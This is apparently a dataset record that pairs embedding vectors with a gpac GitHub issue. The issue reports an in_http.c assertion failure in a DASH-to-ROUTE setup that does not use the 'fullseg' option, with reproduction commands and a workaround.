-0.009268926456570625, -0.009896671399474144, 0.01261689979583025, 0.006502198521047831, -0.007071818690747023, 0.00210023345425725, -0.0044097150675952435, -0.003105787793174386, 0.01195815484970808, 0.0008553994703106582, 0.0017321112100034952, 0.018785851076245308, 0.01380264014005661, -0.010671664960682392, 0.00019386954954825342, 0.0024761054664850235, -0.006785070989280939, -0.008369933813810349, 0.006602947600185871, 0.006258075591176748, -0.0026698538567870855, -0.004754587076604366, 0.01298114750534296, -0.006486698519438505, -0.002662103855982423, -0.013399643823504448, -0.0034584100358188152, 0.008579181507229805, 0.0003598877810873091, 0.008315684273838997, -0.026473790407180786, -0.018429353833198547, 0.0185223538428545, -0.01246965117752552, 0.004370965529233217, -0.023652812466025352, -0.0092534264549613, -0.013174895197153091, -0.006184450816363096, 0.018258854746818542, 0.005560581106692553, -0.006583572831004858, -0.012562650255858898, -0.01711186394095421, 0.0029604765586555004, 0.0036482836585491896, 0.013446143828332424, 0.01226815301924944, 0.01176440715789795, -0.015337128192186356, -0.0021757951471954584, -0.027078285813331604, 0.0033983481116592884, 0.008811679668724537, 0.0020847334526479244, 0.002983726328238845, 0.005405582021921873, -0.004285715986043215, 0.007974687032401562, 0.003388660727068782, 0.017406361177563667, 0.012151903472840786, -0.01586412452161312, -0.011043662205338478, -0.00513045908883214, 0.0019432971021160483, -0.010896413587033749, -0.006420824211090803, -0.012020154856145382, 0.004936710931360722, 0.014507885091006756, -0.007625939324498177, -0.007005944382399321, -0.003322786185890436, 0.024148808792233467, -0.004599588457494974, 0.0036482836585491896, 0.022660819813609123, 0.005781454034149647, 0.01653836853802204, -0.004266341216862202, -0.01748386211693287, 0.008672181516885757, -0.013554642908275127, -0.0025245423894375563, 0.001953953178599477, -0.007614314556121826, -0.038253698498010635, -0.012020154856145382, 0.008168435655534267, -0.0036695958115160465, -0.007439941167831421, 0.0012671150034293532, 0.0029217267874628305, -0.010966163128614426, 0.005324207711964846, 0.01297339703887701, 0.00993542093783617, 0.014190137386322021, -0.0061108265072107315, 0.0019403909100219607, 0.006626197602599859, 0.018739352002739906, 0.016646867617964745, -0.00538620725274086, 0.01712736487388611, -0.012043404392898083, 0.007463190704584122, 0.010997163131833076, -0.00026180260465480387, -0.01363214198499918, 0.006924570072442293, -0.01886335015296936, -0.02962026558816433, 0.012554900720715523, 0.018553351983428, 0.03064325638115406, 0.006858695764094591, -0.01163265760987997, -0.003646346041932702, -0.019281847402453423, 0.02554379776120186, 0.008842679671943188, 0.016646867617964745, -0.01429088693112135, 0.0126478997990489, -0.00673857145011425, -0.01587187498807907, -0.004014468286186457, 0.05920952931046486, -0.0002142131415894255, 0.02729528397321701, 0.015654874965548515, -0.0032704740297049284, -0.006606822833418846, -0.011872906237840652, -0.0074205659329891205, -0.0030941630247980356, -0.0061108265072107315, 0.0030205384828150272, 0.0008839773363433778, 0.0012864897726103663, -0.003189099719747901, -0.008137435652315617, 0.007095068693161011, -0.00006763032433809713, -0.0022746070753782988, -0.0005652611143887043, -0.016057873144745827, -0.025419797748327255, -0.002538104774430394, 0.019808843731880188, -0.010632915422320366, -0.009834672324359417, 0.01295014750212431, 0.01780935935676098, -0.011671407148241997, 0.0031096627935767174, 0.008028936572372913, 0.024784304201602936, -0.010997163131833076, -0.012857148423790932, -0.011927155777812004, 0.010284168645739555, 0.024179808795452118, 0.006587447598576546, 0.018739352002739906, 0.0036560334265232086, 0.00910617783665657, -0.0022203573025763035, 0.01818135567009449, -0.02424180693924427, -0.004068717826157808, -0.005401707254350185, -0.001487988163717091, -0.012105404399335384, 0.007509690243750811, 0.008493932895362377, 0.009741672314703465, 0.00020827959815505892, 0.003884656587615609, -0.005231208633631468, 0.0009232114534825087, -0.008803930133581161, 0.0185223538428545, 0.0061147017404437065, -0.016972364857792854, -0.005874453578144312, -0.009454924613237381, -0.020459838211536407, -0.0010946787660941482, -0.007350816857069731, -0.016414370387792587, -0.020723335444927216, 0.0073081920854747295, 0.004657713230699301, 0.006668821908533573, -0.006250325590372086, 0.030255760997533798, -0.00032816146267578006, 0.004905710928142071, -0.020955834537744522, 0.00809093564748764, -0.017251363024115562, -0.009873421862721443, 0.02394730970263481, 0.007823563180863857, 0.011245161294937134, -0.000624838809017092, 0.00136592669878155, -0.014631884172558784, 0.019808843731880188, 0.00290041440166533, -0.0064324489794671535, -0.005634205415844917, -0.008672181516885757, -0.005180833861231804, -0.013415143825113773, 0.006316199898719788, 0.017731860280036926, -0.004599588457494974, -0.008974429219961166, -0.005432706791907549, 0.016600368544459343, -0.010942913591861725, -0.005409457255154848, -0.006025577429682016, 0.008338933810591698, -0.0011324597289785743, 0.0151743795722723, 0.0032259118743240833, -0.017096364870667458, 0.010020670481026173, 0.011407909914851189, 0.010129169560968876, 0.0013736765831708908, 0.0034119104966521263, -0.0017001427477225661, 0.002954664174467325, 0.019080348312854767, 0.0020188589114695787, -0.01479463279247284, 0.01756136119365692, 0.023048317059874535, 0.008912429213523865, -0.012082153931260109, -0.0019442657940089703, 0.009501424618065357, 0.0036192212719470263, -0.004762337077409029, -0.012702149339020252, 0.040888674557209015, 0.021017832681536674, 0.009648673236370087, -0.005424956791102886, -0.009113927371799946, 0.022815819829702377, 0.0002454550703987479, 0.011493158526718616, -0.0049173361621797085, -0.008633431978523731, 0.021668829023838043, 0.003865281818434596, -0.00748644070699811, 0.014438135549426079, -0.008493932895362377, 0.03744770213961601, 0.013012146577239037, -0.015352628193795681, 0.0003896765992976725, 0.030457258224487305, -0.015135630033910275, -0.005622580647468567, -0.01749936118721962, 0.02997676283121109, -0.014771383255720139, 0.023792311549186707, -0.019715843722224236, -0.018026357516646385, -0.0010704603046178818, 0.03509172052145004, 0.021420830860733986, 0.006754071451723576, -0.003338285954669118, -0.006153451278805733, 0.000901899125892669, 0.01163265760987997, 0.004440714605152607, -0.014616384170949459, 0.0126246502622962, 0.0061767008155584335, -0.0009643829544074833, 0.003685095813125372, 0.007478690706193447, 0.0015800186665728688, -0.0043593402951955795, -0.00632394989952445, 0.023389315232634544, 0.007850687950849533, -0.012012404389679432, -0.005246708169579506, 0.01722036302089691, -0.006932320073246956, -0.00038434850284829736, 0.026194792240858078, 0.020816335454583168, -0.006781196221709251, 0.012353401631116867, 0.007842937484383583, 0.025357799604535103, 0.001133428537286818, -0.016073372215032578, 0.011113411746919155, 0.05350557714700699, -0.018630852922797203, -0.00103074184153229, -0.002726040780544281, 0.008679931052029133, -0.005614830646663904, -0.00349134742282331, -0.011028162203729153, -0.012516151182353497, 0.0026001043152064085, -0.013732891529798508, 0.0057427044957876205, 0.000811806065030396, 0.008610181510448456, 0.017003364861011505, 0.004010593052953482, 0.0055567058734595776, -0.023296315222978592, -0.006238700356334448, 0.006622322369366884 ]
114
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Result: ``` [ROUTE] Failed to remove object video_dash_track2_226.m4s from service, object not found 100000 <= 1448 gpac: filters/in_http.c:417: httpin_process: Assertion `ctx->nb_read <= b_size' failed. Abandon ``` Terminal 1: ``` rm -rf /tmp/gpac/route1 && gpac avgen:#BUrl=.,http://127.0.0.1:8080/ enc:c=avc:fintra=1 @ reframer:rt=on:FID=EV enc:c=aac @ reframer:rt=on:FID=EA -o http://localhost:8080/live.mpd:profile=live:dmode=dynamic:segdur=2:reqlog='*':cors=auto:rdirs=/tmp/gpac/route1:SID=EA,EV ``` Terminal 2: ``` gpac -i http://127.0.0.1:8080/live.mpd dashin:forward=file @ -o route://225.1.1.0:6000:llmode ``` Terminal 3: ``` rm -rf /tmp/gpac/route2 && gpac -graph -i route://225.1.1.0:6000/:max_segs=40 dashin:forward=file @ httpout:port=8081:rdirs=/tmp/gpac/route2:reqlog='*':cors=auto ``` Adding ```:fullseg=true``` in the input of terminal 3 solves the issue.
gpac: filters/in_http.c:417: httpin_process: Assertion `ctx->nb_read <= b_size' failed. when not using 'fullseg'
https://api.github.com/repos/gpac/gpac/issues/1779/comments
4
2021-05-06T14:56:54
2021-05-19T10:01:59Z
https://github.com/gpac/gpac/issues/1779
877,588,711
1,779
false
This is a GitHub Issue repo:gpac owner:gpac Title : gpac: filters/in_http.c:417: httpin_process: Assertion `ctx->nb_read <= b_size' failed. when not using 'fullseg' Issue date: --- start body --- Result: ``` [ROUTE] Failed to remove object video_dash_track2_226.m4s from service, object not found 100000 <= 1448 gpac: filters/in_http.c:417: httpin_process: Assertion `ctx->nb_read <= b_size' failed. Abandon ``` Terminal 1: ``` rm -rf /tmp/gpac/route1 && gpac avgen:#BUrl=.,http://127.0.0.1:8080/ enc:c=avc:fintra=1 @ reframer:rt=on:FID=EV enc:c=aac @ reframer:rt=on:FID=EA -o http://localhost:8080/live.mpd:profile=live:dmode=dynamic:segdur=2:reqlog='*':cors=auto:rdirs=/tmp/gpac/route1:SID=EA,EV ``` Terminal 2: ``` gpac -i http://127.0.0.1:8080/live.mpd dashin:forward=file @ -o route://225.1.1.0:6000:llmode ``` Terminal 3: ``` rm -rf /tmp/gpac/route2 && gpac -graph -i route://225.1.1.0:6000/:max_segs=40 dashin:forward=file @ httpout:port=8081:rdirs=/tmp/gpac/route2:reqlog='*':cors=auto ``` Adding ```:fullseg=true``` in the input of terminal 3 solves the issue. --- end body ---
1,113
[ -0.03315000236034393, 0.018258046358823776, -0.012983500026166439, 0.01776214875280857, 0.010534066706895828, -0.019730713218450546, -0.005575091112405062, 0.05217443406581879, -0.03886033594608307, 0.010774501599371433, -0.00013759279681835324, 0.003277807729318738, 0.032699186354875565, -0.015688395127654076, 0.010158387012779713, 0.014651519246399403, -0.030369969084858894, -0.0006560311885550618, -0.0013937727781012654, -0.013171340338885784, 0.02407357282936573, 0.0017948111053556204, -0.032188259065151215, 0.042677246034145355, -0.00864063948392868, 0.009767679497599602, -0.03552429750561714, 0.0021150782704353333, -0.024434225633740425, -0.009647461585700512, 0.0001872529974207282, 0.025936946272850037, 0.011751269921660423, 0.03594506159424782, 0.04913894087076187, 0.007040242664515972, 0.05157334730029106, 0.04249691963195801, 0.010135846212506294, 0.005312114953994751, -0.00807711947709322, -0.04174555838108063, -0.05460884049534798, 0.005541279911994934, -0.013359179720282555, 0.03483304753899574, 0.005518739111721516, 0.010999909602105618, -0.027665073052048683, -0.038048867136240005, 0.0021376190707087517, -0.024058546870946884, -0.014644005335867405, -0.03913082554936409, -0.01615423895418644, -0.03471282869577408, 0.04841763526201248, -0.0018276830669492483, -0.031917769461870193, 0.009805247187614441, -0.00881345197558403, -0.0017901151441037655, -0.023066751658916473, 0.027965618297457695, -0.008189823478460312, 0.010226009413599968, -0.013321612030267715, 0.01776214875280857, -0.021819492802023888, 0.025561265647411346, 0.004143750295042992, -0.01436600275337696, -0.014501247555017471, 0.008963724598288536, 0.029889099299907684, -0.02901752106845379, 0.05815526098012924, 0.02006131038069725, -0.02471974305808544, -0.020602289587259293, -0.04472094401717186, -0.00934691820293665, -0.04327833279967308, -0.0037549214903265238, 0.009429567493498325, -0.020076338201761246, 0.004376671742647886, -0.06738196313381195, 0.0068486458621919155, -0.038048867136240005, -0.002755612600594759, 0.004384185187518597, 0.03630571439862251, -0.0026673278771340847, 0.005582604557275772, 0.025471102446317673, -0.021939711645245552, -0.0144035704433918, -0.05082198604941368, 0.0019309951458126307, -0.04989030212163925, -0.01555315125733614, 0.001205932698212564, 0.0006090711685828865, 0.04204610362648964, -0.002346121473237872, 0.009542271494865417, -0.03209809586405754, 0.02695879526436329, 0.12923391163349152, 0.0178372859954834, 0.011029964312911034, -0.015478014945983887, -0.010023142211139202, -0.02808583527803421, -0.011773810721933842, -0.01150332111865282, -0.020617317408323288, 0.02428395487368107, 0.011105100624263287, -0.013734860345721245, -0.02105310559272766, -0.006859916262328625, 0.02976888231933117, 0.007258137222379446, 0.041925884783267975, -0.00692002521827817, -0.008565503172576427, -0.03546418994665146, -0.029348120093345642, -0.024945151060819626, -0.01604904793202877, -0.009414540603756905, -0.013689778745174408, 0.024193791672587395, -0.028446488082408905, -0.04084392637014389, 0.03423196077346802, 0.019024433568120003, -0.0053496831096708775, -0.037297509610652924, -0.03049018792808056, 0.06383553892374039, 0.002325459150597453, -0.0012388047762215137, 0.02465963363647461, -0.01033871341496706, -0.02139873243868351, -0.04832747206091881, 0.035374026745557785, -0.020587263628840446, -0.004515673499554396, 0.004061100538820028, -0.003944639582186937, 0.0356745719909668, 0.0015750383026897907, -0.0029904127586632967, 0.00939951278269291, 0.0066082109697163105, -0.02784539945423603, 0.012074355036020279, -0.02294653281569481, 0.0012331695761531591, -0.011886514723300934, -0.010030655190348625, 0.009219186380505562, 0.015417906455695629, 0.003135049482807517, -0.004846271593123674, 0.004752351902425289, -0.023277131840586662, 0.00016752979718148708, 0.02798064425587654, 0.027109067887067795, -0.030099479481577873, -0.02396838366985321, 0.0064729661680758, 0.044871218502521515, -0.019865958020091057, 0.034382231533527374, -0.003563324688002467, -0.026913713663816452, -0.013163826428353786, -0.028626814484596252, 0.016890572383999825, -0.019865958020091057, 0.015350284054875374, -0.04231659322977066, -0.010661797598004341, -0.02311183325946331, 0.0015478015411645174, 0.018393291160464287, 0.003043007804080844, -0.015823639929294586, -0.030354943126440048, -0.007059026975184679, -0.03076067753136158, -0.04054338485002518, 0.01119526382535696, -0.009181618690490723, -0.018047666177153587, -0.025936946272850037, 0.0057629309594631195, 0.02867189608514309, -0.03792865201830864, 0.0025715294759720564, -0.0018464671447873116, 0.04481110721826553, 0.0038619902916252613, -0.016454782336950302, -0.007569951470941305, -0.04153518006205559, 0.01906951516866684, 0.01009827759116888, -0.03284945711493492, 0.0020568477921187878, -0.00897123757749796, 0.02719923108816147, 0.007318246178328991, -0.011420671828091145, 0.06347488611936569, -0.018648754805326462, -0.013501938432455063, 0.011443212628364563, -0.03795870393514633, -0.01484687253832817, 0.01794247515499592, -0.02955850027501583, -0.01628948375582695, 0.02805578149855137, 0.00894869677722454, 0.0032796862069517374, 0.004436780698597431, 0.01588374935090542, -0.029272984713315964, 0.015169957652688026, -0.0342920683324337, -0.028626814484596252, -0.005052895750850439, 0.0037248670123517513, 0.0029077630024403334, 0.06197217106819153, -0.029708772897720337, 0.012472575530409813, -0.009023833088576794, 0.03284945711493492, -0.0005174991674721241, 0.01625942997634411, -0.009917951188981533, 0.014989631250500679, -0.04739578813314438, -0.018047666177153587, 0.007716466672718525, 0.0025583805982023478, -0.0043729147873818874, 0.013952754437923431, -0.01311874482780695, -0.003193279728293419, -0.037778377532958984, -0.05704324692487717, 0.0059770685620605946, -0.002826991956681013, -0.017807230353355408, -0.0010979247745126486, 0.014396056532859802, -0.03011450730264187, -0.005522495601326227, 0.019880983978509903, -0.0055074687115848064, -0.00876085739582777, 0.0014426111010834575, -0.0021263486705720425, -0.051182638853788376, -0.004786163102835417, -0.008550476282835007, -0.01162353903055191, 0.03741772472858429, -0.013051122426986694, -0.005785471759736538, -0.004729811102151871, -0.0216091126203537, 0.000898344733286649, -0.0353139191865921, -0.010443903505802155, -0.009692543186247349, -0.00545111671090126, 0.0006062535685487092, -0.0034900670871138573, -0.02118835039436817, -0.00015532018733210862, 0.02359270304441452, 0.019249841570854187, -0.049259159713983536, 0.002002374269068241, 0.016695218160748482, 0.014598923735320568, 0.004632133990526199, -0.007645087782293558, -0.0026203677989542484, 0.017236197367310524, -0.04060349240899086, 0.02859676070511341, 0.017461605370044708, -0.02768010087311268, -0.03720734640955925, -0.020722508430480957, -0.008482853882014751, -0.0074534909799695015, 0.018182910978794098, -0.010774501599371433, 0.024389144033193588, -0.03137679025530815, 0.00041770917596295476, -0.0033191326074302197, 0.008415231481194496, -0.026943767443299294, 0.014704114757478237, -0.020527154207229614, -0.020497100427746773, 0.019986175000667572, -0.010556607507169247, -0.016544945538043976, -0.05298590287566185, 0.007881766185164452, 0.02033179998397827, -0.0012228382984176278, -0.010421362705528736, 0.01618429273366928, -0.047576114535331726, -0.000946713553275913, 0.004286508541554213, -0.01193159632384777, -0.010030655190348625, -0.04009256884455681, -0.004136236384510994, -0.06605956703424454, -0.025380939245224, -0.008963724598288536, 0.04375920444726944, -0.020962942391633987, -0.016965707764029503, -0.0005710335681214929, 0.03597511351108551, -0.01851351000368595, 0.01858864538371563, 0.0462837740778923, 0.015462988056242466, -0.01162353903055191, 0.01968563161790371, 0.003555811010301113, 0.000990855973213911, 0.04961981251835823, 0.009204159490764141, 0.042707301676273346, 0.01821296475827694, 0.00389204453676939, -0.007859225384891033, -0.0024137438740581274, 0.01639467477798462, -0.0224656630307436, 0.02701890468597412, -0.03690680116415024, -0.008753343485295773, 0.04030294716358185, 0.020136447623372078, -0.0037004477344453335, -0.016124185174703598, -0.014155621640384197, -0.016484837979078293, -0.005143058951944113, -0.044871218502521515, 0.03576473519206047, -0.0387401208281517, 0.014628978446125984, -0.015538124367594719, -0.008881074376404285, 0.03242869675159454, -0.010714393109083176, -0.03937126323580742, 0.0000882260937942192, -0.0411444716155529, 0.01621434837579727, 0.017191115766763687, -0.04445045441389084, 0.01837826520204544, 0.032218314707279205, -0.017326360568404198, 0.03768821433186531, -0.03868000954389572, -0.029408229514956474, -0.022570854052901268, 0.013554533943533897, -0.043638985604047775, -0.03131668269634247, -0.024915095418691635, 0.0072806780226528645, -0.03982207924127579, -0.03233853355050087, 0.01995612122118473, -0.03798875957727432, 0.03387130796909332, -0.013096204027533531, 0.024163736030459404, 0.009519730694591999, -0.00965497549623251, 0.050671715289354324, 0.02184954844415188, -0.018573617562651634, 0.00824993196874857, -0.005004057195037603, 0.015688395127654076, -0.02867189608514309, -0.005473657511174679, -0.004695999901741743, 0.032458748668432236, 0.03931115195155144, -0.002532083075493574, -0.02468968741595745, -0.05884651094675064, 0.022856369614601135, -0.033660925924777985, 0.019520331174135208, 0.008978751488029957, -0.008242418989539146, 0.04207615926861763, 0.029753854498267174, 0.00004018014806206338, 0.031527064740657806, 0.01663510873913765, -0.029378173872828484, 0.03471282869577408, 0.003807516535744071, -0.02768010087311268, -0.00664577865973115, -0.00054238794837147, -0.025967000052332878, -0.056051451712846756, -0.027604965493083, -0.01786733977496624, 0.011736243031919003, -0.037117183208465576, 0.01879902556538582, -0.006818591617047787, 0.002928425557911396, 0.011307967826724052, -0.05878640338778496, -0.05250503495335579, -0.004489375744014978, 0.022991614416241646, -0.02428395487368107, -0.005297087598592043, 0.05370720848441124, 0.011841433122754097, -0.029648663476109505, 0.0035896222107112408, -0.0013045486994087696, 0.016199320554733276, -0.011706188321113586, 0.047576114535331726, -0.0028946143575012684, -0.018889188766479492, 0.00431280629709363, -0.001699012704193592, 0.02682355046272278, 0.031497009098529816, 0.025110449641942978, -0.006401586811989546, -0.013223934918642044, 0.012615333311259747, -0.03570462390780449, 0.012217112816870213, -0.008422745391726494, -0.013614642433822155, 0.020076338201761246, -0.02958855591714382, 0.02287139743566513, -0.04977008327841759, -0.0024325279518961906, 0.02222522720694542, -0.021038079634308815, -0.006732185371220112, -0.013276530429720879, 0.06467706710100174, 0.014471192844212055, -0.026147326454520226, -0.00889610219746828, 0.004756108392030001, -0.010301144793629646, -0.032188259065151215, -0.011758783832192421, 0.002826991956681013, 0.007092838175594807, -0.02284134365618229, -0.009512216784060001, 0.020076338201761246, -0.0011054383357986808, 0.006082259118556976, 0.021894630044698715, 0.008114687167108059, 0.007461004424840212, 0.0257265642285347, -0.014613951556384563, 0.031016139313578606, -0.007791602984070778, 0.03215820714831352, -0.02215009182691574, -0.002539596753194928, 0.032488804310560226, -0.018738918006420135, -0.033210109919309616, -0.033901359885931015, -0.007896793074905872, -0.012938418425619602, -0.06323445588350296, -0.006311423610895872, -0.001707465504296124, 0.014072972349822521, -0.009782706387341022, 0.02112824283540249, 0.017702041193842888, 0.0014444895787164569, -0.02102305181324482, -0.01711598038673401, 0.025711538270115852, -0.00677351001650095, 0.03278934955596924, 0.0035877437330782413, -0.013870105147361755, -0.005236979108303785, -0.025125477463006973, -0.020121419802308083, 0.005868121515959501, -0.01693565398454666, 0.048537854105234146, -0.01879902556538582, -0.01338923443108797, -0.011127641424536705, 0.040272895246744156, 0.017176087945699692, 0.002447555074468255, -0.03200793266296387, 0.03837946802377701, -0.03315000236034393, 0.017236197367310524, -0.02215009182691574, 0.04820725694298744, -0.013629669323563576, 0.02592191845178604, -0.021323595196008682, -0.021954737603664398, 0.01025606319308281, -0.027695128694176674, 0.007325759623199701, -0.0034092958085238934, 0.007013945374637842, 0.016304511576890945, 0.028747031465172768, 0.030069425702095032, 0.016064075753092766, 0.0028908574022352695, 0.005409791599959135, 0.010000601410865784, 0.010008114390075207, -0.034652721136808395, -0.0267484150826931, 0.00389204453676939, 0.006431641057133675, -0.0024982718750834465, -0.021143268793821335, -0.008941183798015118, 0.002254079794511199, -0.0030561566818505526, 0.0034205662086606026, -0.020211583003401756, -0.0017807231051847339, 0.016109157353639603, 0.002826991956681013, -0.010984882712364197, -0.019640550017356873, 0.010887205600738525, 0.03131668269634247, -0.035343971103429794, 0.006687103770673275, 0.030505213886499405, 0.0030561566818505526, -0.006258828565478325, 0.026898685842752457, -0.0008119383710436523, 0.003798124613240361, -0.0047598653472959995, -0.007600006181746721, 0.00015320698730647564, 0.00889610219746828, -0.02208998240530491, -0.018648754805326462, 0.0018755822675302625, 0.014891954138875008, 0.026042135432362556, 0.01471162773668766, -0.006194962654262781, -0.025591319426894188, 0.03994229435920715, -0.03131668269634247, -0.024674661457538605, -0.024960177019238472, 0.022165119647979736, 0.012239653617143631, 0.02233041822910309, -0.05469900369644165, 0.03239864110946655, 0.0018924878677353263, 0.031226519495248795, 0.06203227862715721, -0.007205542176961899, 0.015064767561852932, -0.005135545507073402, 0.03690680116415024, -0.011894028633832932, -0.012592792510986328, 0.019745739176869392, 0.019324978813529015, -0.046644426882267, 0.03375108912587166, -0.03030986152589321, -0.003014831803739071, 0.032969675958156586, 0.0034731614869087934, -0.034682776778936386, -0.024885041639208794, -0.021579058840870857, -0.034171849489212036, -0.0009429567726328969, -0.01238241232931614, -0.025711538270115852, -0.011578457430005074, 0.004004748538136482, 0.04204610362648964, -0.03131668269634247, -0.009572326205670834, -0.009098969399929047, -0.013862591236829758, 0.006540588568896055, -0.016755327582359314, -0.0001412321871612221, -0.03116641193628311, 0.008550476282835007, 0.00893366988748312, 0.003907071892172098, -0.001970441546291113, 0.036816637963056564, -0.00690875481814146, -0.01693565398454666, 0.027169175446033478, 0.017266251146793365, 0.0432182252407074, -0.02129354141652584, 0.024854987859725952, 0.029303038492798805, -0.019805848598480225, -0.0003604179946705699, -0.028130916878581047, -0.032488804310560226, 0.008835992775857449, -0.03315000236034393, 0.004970245994627476, -0.0027405854780226946, -0.005518739111721516, -0.0009964911732822657, -0.004207615740597248, 0.01971568539738655, -0.00846782699227333, -0.03786854073405266, 0.034141797572374344, -0.010090764611959457, -0.007896793074905872, -0.011480780318379402, 0.002657935954630375, 0.000008438124496024102, 0.0031876445282250643, 0.011180236004292965, 0.00433910358697176, -0.018919244408607483, -0.013058636337518692, 0.014050431549549103, -0.03134673833847046, -0.0024456765968352556, -0.009707571007311344, 0.02051212638616562, -0.004489375744014978, -0.03254891186952591, 0.04009256884455681, -0.00833258219063282, 0.021759385243058205, 0.03239864110946655, -0.020902834832668304, -0.03251885995268822, 0.010872178710997105, -0.025095421820878983, -0.010023142211139202, -0.01728127896785736, -0.042406756430864334, 0.013787454925477505, 0.016620082780718803, -0.024223845452070236, 0.001092289574444294, 0.025290776044130325, -0.007554924581199884, -0.015192498452961445, 0.0028345054015517235, 0.023848164826631546, 0.0060371775180101395, 0.014508760534226894, 0.012367384508252144, -0.0026203677989542484, 0.00862561259418726, 0.0015703423414379358, -0.010263577103614807, -0.031196465715765953, -0.03263907507061958, 0.015252606943249702, 0.009519730694591999, -0.016244402155280113, -0.0017732095438987017, -0.031076248735189438, -0.004538214299827814, 0.0024212575517594814, 0.031046193093061447, 0.0262374896556139, -0.012682955712080002, 0.0028589246794581413, 0.003666636534035206, -0.029618609696626663, 0.00030453558429144323, 0.00504162535071373, -0.007306975778192282, 0.00391082838177681, 0.0033153758849948645, 0.0103762811049819, 0.018889188766479492, 0.017431551590561867, 0.004335347097367048, -0.020346827805042267, 0.002840140601620078, -0.020346827805042267, -0.019219787791371346, -0.030775703489780426, -0.011924082413315773, 0.010977368801832199, -0.01325398962944746, -0.027394583448767662, -0.014891954138875008, 0.02506536804139614, 0.038289304822683334, -0.025260722264647484, -0.041234634816646576, 0.013051122426986694, 0.04499143362045288, -0.022856369614601135, -0.008866047486662865, -0.018919244408607483, 0.021143268793821335, -0.020016228780150414, 0.005868121515959501, -0.01162353903055191, -0.004143750295042992, -0.018363237380981445, 0.00237054075114429, -0.028882276266813278, 0.004196345340460539, 0.00994800589978695, 0.0030317374039441347, 0.016274455934762955, -0.021353650838136673, -0.013832536526024342, 0.04306795448064804, 0.000509515986777842, 0.015162443742156029, 0.028251133859157562, -0.004658431746065617, 0.007412165869027376, -0.024389144033193588, 0.013336638920009136, -0.030219698324799538, 0.017566796392202377, 0.011976677924394608, -0.02270609885454178, 0.029197847470641136, -0.013569560833275318, 0.03630571439862251, -0.004177561495453119, -0.009474649094045162, -0.034682776778936386, 0.03233853355050087, -0.02730442024767399, -0.027755236253142357, -0.015072280541062355, 0.009219186380505562, 0.010271091014146805, -0.022886425256729126, -0.013569560833275318, 0.01834820955991745, -0.022916479036211967, -0.011067532002925873, -0.017671985551714897, -0.010962341912090778, -0.03480299189686775, -0.04141496121883392, -0.015094821341335773, -0.01968563161790371, 0.027274366468191147, 0.0006907815695740283, -0.014891954138875008, -0.00012432658695615828, -0.019355032593011856, -0.0031707389280200005, 0.006221260409802198, 0.005379737354815006, -0.039251044392585754, -0.02345745824277401, 0.0032364830840379, -0.011811378411948681, 0.006225017365068197, -0.0027687614783644676, -0.023953355848789215, 0.004549484699964523, -0.04117452725768089, 0.005894418805837631, 0.015207525342702866, 0.01663510873913765, 0.015162443742156029, -0.012344843707978725, 0.009985573589801788, -0.025816727429628372, -0.018633726984262466, -0.025636401027441025, 0.00897123757749796, -0.0038018813356757164, 0.013809995725750923, -0.008460313081741333, 0.04279746487736702, -0.008565503172576427, -0.0023517566733062267, 0.010812070220708847, -0.021729329600930214, -0.016244402155280113, -0.04066359996795654, 0.009429567493498325, -0.021308569237589836, 0.005394764710217714, 0.0238331388682127, 0.003058035159483552, 0.051182638853788376, 0.017807230353355408, 0.024133682250976562, -0.04417996481060982, 0.003443107008934021, 0.0017591215437278152, -0.006664562970399857, 0.015613259747624397, -0.016680190339684486, 0.043368496000766754, 0.01513990294188261, -0.021894630044698715, 0.007434706669300795, 0.004324076697230339, 0.02033179998397827, -0.01090223342180252, -0.057764552533626556, -0.0033454301301389933, -0.010827097110450268, -0.014899468049407005, -0.024088600650429726, -0.002751855878159404, 0.0003146319941151887, 0.01937006041407585, 0.008482853882014751, 0.0052895741537213326, -0.02664322406053543, -0.030835812911391258, 0.013261503539979458, -0.005909446161240339, -0.0005823039682582021, -0.015748504549264908, 0.014433625154197216, 0.023307185620069504, -0.016980735585093498, 0.015154930762946606, -0.030805759131908417, 0.007344543468207121, -0.006379046011716127, -0.010301144793629646, -0.016860516741871834, -0.03411174193024635, -0.045562468469142914, 0.004079884383827448, 0.00965497549623251, -0.008490367792546749, -0.0019441439071670175, -0.012848255224525928, -0.03185766190290451, -0.005669010803103447, -0.00735581386834383, -0.011413157917559147, 0.005943257361650467, -0.004729811102151871, -0.03236858546733856, 0.016605054959654808, 0.023998437449336052, -0.009685030207037926, -0.009121510200202465, 0.005939500406384468, -0.0018953054677695036, -0.015200012363493443, -0.03164727985858917, -0.030054397881031036, -0.03726745396852493, -0.03846963122487068, 0.015154930762946606, 0.009279295802116394, 0.042526975274086, -0.005608902312815189, 0.00015672898734919727, -0.006976377218961716, 0.02901752106845379, -0.015034712851047516, -0.018768971785902977, -0.008655666373670101, -0.011473266407847404, -0.008437772281467915, 0.027529828250408173, 0.006131097208708525, -0.001861494267359376, -0.03501337394118309, -0.004823730792850256, 0.026733387261629105, -0.01035374030470848, 0.0001546157873235643, -0.016094129532575607, -0.044841162860393524, -0.04637393727898598, 0.006168665364384651, 0.009098969399929047, 0.009835301898419857, -0.006987647619098425, 0.006829862017184496, 0.012743065133690834, 0.01786733977496624, -0.005402278155088425, -0.03750788792967796, -0.008264959789812565, -0.02490006946027279, -0.00905388779938221, -0.015973912551999092, -0.025561265647411346, -0.04351877048611641, -0.00893366988748312, -0.016229374334216118, -0.015763532370328903, 0.013825023546814919, 0.028251133859157562, 0.019024433568120003, 0.030925976112484932, -0.002932182280346751, -0.018197938799858093, -0.018167883157730103, 0.012284735217690468, -0.005792985204607248, 0.0035689598880708218, -0.002920911880210042, -0.005988338962197304, -0.02771015465259552, -0.007675142027437687, 0.002541474997997284, 0.024223845452070236, 0.014666546136140823, 0.06353499740362167, -0.022345446050167084, -0.03810897842049599, -0.032248370349407196, -0.0031087517272681, 0.005785471759736538, -0.0005658679874613881, 0.029107684269547462, -0.02763501927256584, -0.010443903505802155, -0.012472575530409813, 0.020316774025559425, 0.007269407622516155, 0.024915095418691635, -0.016544945538043976, -0.010676825419068336, 0.02407357282936573, 0.01663510873913765, -0.026012081652879715, 0.0504012256860733, 0.028416434302926064, -0.009722597897052765, -0.005593874957412481, 0.00791933387517929, -0.022991614416241646, -0.018874162808060646, -0.01140564400702715, 0.01076698862016201, 0.015019685961306095, -0.012074355036020279, -0.004816217347979546, -0.000457155576441437, 0.03272923827171326, -0.023773029446601868, 0.023758001625537872, -0.023517567664384842, -0.03765816241502762, 0.014328434132039547, 0.0006217503687366843, -0.019024433568120003, 0.0026842334773391485, -0.04520181566476822, 0.016710245981812477, -0.00489511014893651, 0.00967000238597393, -0.012269708327949047, 0.003212063806131482, 0.008460313081741333, 